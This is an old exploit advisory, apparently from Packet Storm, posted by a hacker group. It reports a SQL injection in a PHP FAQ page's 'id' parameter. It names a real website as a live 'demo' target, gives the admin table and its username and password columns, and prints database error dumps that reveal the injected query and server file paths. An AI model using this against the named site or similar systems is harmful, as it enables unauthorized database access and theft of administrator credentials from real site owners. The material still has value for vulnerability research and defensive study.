DGC SQL Injection

2012-01-28T00:00:00
ID PACKETSTORM:109215
Type packetstorm
Reporter Skote Vahshat
Modified 2012-01-28T00:00:00

Description

                                        
                                            `|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
|* ______ ____ __ __ |  
|* /\__ _\/\ _`\ /\ \/\ \ |  
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |  
|* \ \ \ \ \ _ <'\ \ _ \ |  
|* \ \ \ \ \ \L\ \\ \ \ \ \ |  
|* \ \_\ \ \____/ \ \_\ \_\ |  
|* \/_/ \/___/ \/_/\/_/ |  
|* |  
|* I'm Wolf Long live wolf |  
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
=======================================================================  
\* [Title] :[dgc sql injection vulnerability] /*   
\* [Author] :[skote_vahshat] /*  
\* [Home] :[Http://turk-bh.ir] /*  
\* [Email] :[skote.vahshat@Gmail.Com] /*  
  
=======================================================================  
/* Web Server ==>> [ Apache/2.0.55 (Ubuntu) PHP/4.4.2-1build1 ]  
/* Powered-by ==>> [ PHP/4.4.2-1build1 ]  
/* DB Server ==>> [ MySQL ]  
/*  
/* [+]Exploit :  
/* http://www.target.com/faq2.php?id=[SQLi]  
/* [+]Demo:  
/* http://www.dgc.ca/faq2.php?language=0&id=173&faqid=573  
/* [+] Tble admin:  
/* bs_availability_user  
/*  
/* [+]column name:  
/* username pass  
/*  
/* [+]ErroR injection:  
/*  
/*  
/*/-----------------------  
/*  
  
/* SELECT * FROM faq WHERE id = 573  
<?php  
= array (  
0 =>   
array (  
'file' => '/mnt/alpha/dgc.ca/include/faq.php',  
'line' => 26,  
'function' => 'querydb',  
'class' => 'faq',  
'type' => '->',  
'args' =>   
array (  
0 => 'SELECT * FROM faq WHERE id = 573\\\'',  
),  
),  
1 =>   
array (  
'file' => '/mnt/alpha/dgc.ca/include/faq.php',  
'line' => 20,  
'function' => 'load',  
'class' => 'faq',  
'type' => '->',  
'args' =>   
array (  
),  
),  
2 =>   
array (  
'file' => '/mnt/alpha/dgc.ca/faq2.php',  
'line' => 150,  
'function' => 'faq',  
'class' => 'faq',  
'type' => '->',  
'args' =>   
array (  
0 => '573\\\'',  
),  
),  
);  
?>  
/*  
// QUERY: SELECT id FROM faq WHERE parent_id = 573\' ORDER BY display_order  
<?php  
= array (  
0 =>   
array (  
'file' => '/mnt/alpha/dgc.ca/include/faq.php',  
'line' => 201,  
'function' => 'querydb',  
'class' => 'faq',  
'type' => '->',  
'args' =>   
array (  
0 => 'SELECT id FROM faq WHERE parent_id = 573\\\' ORDER BY display_order',  
),  
),  
1 =>   
array (  
'file' => '/mnt/alpha/dgc.ca/faq2.php',  
'line' => 151,  
'function' => 'get_children_ids',  
'class' => 'faq',  
'type' => '->',  
'args' =>   
array (  
),  
),  
);  
?>  
=======================================================================  
|_***_| spical thanks : bl4ck.viper ,dr.tofan , nafsh, netqurd |   
|_***_| tbh team , cyberwh team , all turkiS hackers|  
=======================================================================  
`